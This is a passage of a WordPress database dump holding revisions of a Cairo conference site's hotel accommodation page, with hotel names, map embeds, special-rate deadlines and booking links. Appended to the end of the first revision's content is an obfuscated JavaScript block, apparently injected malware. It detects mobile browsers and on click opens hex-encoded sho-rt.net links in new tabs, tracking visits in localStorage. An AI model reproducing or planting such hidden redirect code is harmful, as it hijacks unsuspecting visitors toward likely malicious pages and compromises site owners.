src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<p>&nbsp;</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-02 14:44:06','2023-08-02 14:44:06','',2685,'https://gsw2023.com/?p=5080',0,'revision','',0),
(5081,1,'2023-08-02 14:45:54','2023-08-02 14:45:54','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<p>&nbsp;</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe 